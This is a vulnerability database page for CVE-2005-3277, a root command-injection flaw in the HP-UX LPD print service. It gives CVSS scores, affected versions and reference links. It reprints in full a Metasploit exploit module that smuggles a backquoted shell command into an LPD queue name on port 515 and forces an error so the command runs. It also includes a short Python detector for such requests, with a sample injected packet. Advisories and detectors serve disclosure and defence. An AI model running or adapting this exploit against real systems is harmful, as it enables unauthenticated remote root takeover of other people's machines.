CVE-2005-3277
CVSS 10.0
Published: 2005-10-21 14:02:00
Revised: 2008-09-05 16:53:56
NMCOE

[Original text] The LPD service in HP-UX 10.20 11.11 (11i) and earlier allows remote attackers to execute arbitrary code via shell metacharacters ("`" or single backquote) in a request that is not properly handled when an error occurs, as demonstrated by killing the connection, a different vulnerability than CVE-2002-1473.


[CNNVD] HP-UX LPD Arbitrary Command Execution Vulnerability (CNNVD-200510-162)

        HP-UX (from Hewlett Packard UniX) is a Unix operating system developed by Hewlett-Packard (HP) on the basis of System V.
        The LPD service in HP-UX 10.20, 11.11 (11i) and earlier allows remote attackers to execute arbitrary code via shell metacharacters ("`", a single backquote) in a request that is not handled properly when an error occurs, as demonstrated by killing the connection.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:hp:hp-ux:11.00  HP-UX 11.00
cpe:/o:hp:hp-ux:10.20  HP HP-UX 10.20
cpe:/o:hp:hp-ux:11.11  HP-UX 11.11

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3277
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3277
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-162
(official data source) CNNVD

- Other links and resources

http://www.securityfocus.com/bid/15136
(UNKNOWN)  BID  15136
http://www.frsirt.com/exploits/20051019.hpux_lpd_exec.pm.php
(VENDOR_ADVISORY)  MISC  http://www.frsirt.com/exploits/20051019.hpux_lpd_exec.pm.php
http://archives.neohapsis.com/archives/hp/2002-q3/0064.html
(UNKNOWN)  MISC  http://archives.neohapsis.com/archives/hp/2002-q3/0064.html

- Vulnerability information

HP-UX LPD Arbitrary Command Execution Vulnerability
Critical  Input validation
2005-10-21 00:00:00  2006-01-19 00:00:00
Remote

- Advisories and patches

        No data available

- Vulnerability information (1261)

HP-UX <= 11.11 lpd Remote Command Execution Exploit (meta) (EDBID:1261)
hp-ux remote
2005-10-19 Verified
515 H D Moore
N/A
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::hpux_lpd_exec;
use base "Msf::Exploit";
use IO::Socket;
use IO::Select;
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'HP-UX LPD Command Execution',
	'Version'  => '$Revision: 1.13 $',
	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>'],
	'Arch'  => [ ],
	'OS'    => [ 'hpux' ],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The LPD server port', 515],
	  },
	'Payload' =>
	  {
		'Space'    => 200,
		'Keys'     => ['cmd_nospaceslash'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
        This exploit abuses an unpublished vulnerability in the HP-UX LPD
        service. This flaw allows an unauthenticated attacker to execute
        arbitrary commands with the privileges of the root user. The LPD
        service is only exploitable when the address of the attacking system
        can be resolved by the target. This vulnerability was silently patched
        with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.
}),
	'Refs'  =>  [
		['URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html']
	  ],

	'Keys' => ['lpd'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_path = $self->GetVar('RPATH');
	my $cmd = $self->GetVar('EncodedPayload')->RawPayload;

	my $res;

	# We use a second connection to exploit the bug
	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	  
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	srand(time() + $$);
	my $num = int(rand() * 1000);

	$s->Send("\x02msf$num`$cmd`\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our second job request command");
		$s->Close;
		return;
	}

	$s->Send("\x02 32 cfA187control\n");
	$res = $s->Recv(1, 5);
	if (ord($res) != 0) {
		$self->PrintLine("[*] The target did not accept our control file");
		$s->Close;
		return;
	}

	$self->PrintLine("[*] Remember to kill the telnet process when finished");
	$self->PrintLine("[*] Forcing an error and hijacking the cleanup routine...");
	$s->Send(Pex::Text::AlphaNumText(16384));
	$s->Close;

	return;
}

# milw0rm.com [2005-10-19]
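The request the module above sends is an ordinary RFC 1179 "receive a printer job" command (byte 0x02, queue name, LF) whose queue name carries backquotes. As an added example that is not part of this record or of the Metasploit module, the following detector parses LPD command lines and flags queue names containing shell metacharacters, which is the traffic pattern a defender would want an IDS rule or an lpd log review to surface; the sample requests are constructed, not captured.

```python
from dataclasses import dataclass
from typing import Optional

# RFC 1179 first-byte command codes. Only 0x02 (receive a job) opens the
# session that CVE-2005-3277 abuses, but the queue operand is shared by all.
LPD_COMMANDS = {1: "print-waiting-jobs", 2: "receive-job", 3: "queue-short",
                4: "queue-long", 5: "remove-jobs"}

# Characters that have no business in a printer queue name: a queue name
# that reaches a shell unquoted turns each of these into shell syntax.
SHELL_METACHARS = set("`$;|&<>(){}\n")


@dataclass
class LpdFinding:
    command: str
    queue: str
    suspicious_chars: str   # sorted, de-duplicated metacharacters found


def parse_lpd_request(raw: bytes) -> Optional[LpdFinding]:
    """Decode the command line that opens an LPD session.

    Returns None for input that is not a well-formed RFC 1179 command line,
    otherwise a finding whose suspicious_chars is non-empty when the queue
    name carries shell metacharacters.
    """
    if len(raw) < 2 or raw[0] not in LPD_COMMANDS:
        return None
    line, _, _ = raw[1:].partition(b"\n")          # command line only
    queue = line.split(b" ", 1)[0].decode("latin-1")  # first operand = queue
    bad = "".join(sorted({c for c in queue if c in SHELL_METACHARS}))
    return LpdFinding(LPD_COMMANDS[raw[0]], queue, bad)


def is_metachar_injection(raw: bytes) -> bool:
    """True when any LPD command names a queue containing shell metacharacters."""
    finding = parse_lpd_request(raw)
    return finding is not None and bool(finding.suspicious_chars)


# Constructed sample requests (not captured traffic): a normal job
# submission and one shaped like the request this vulnerability concerns.
SAMPLES = {
    "benign": b"\x02lp\n",
    "metachar": b"\x02msf123`cmd`\n",
}

if __name__ == "__main__":
    for name, pkt in SAMPLES.items():
        print(name, parse_lpd_request(pkt), is_metachar_injection(pkt))
```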

- Vulnerability information

21592
HP-UX lpd Shell Metacharacter Remote Command Execution
Remote / Network Access
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-10-19 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete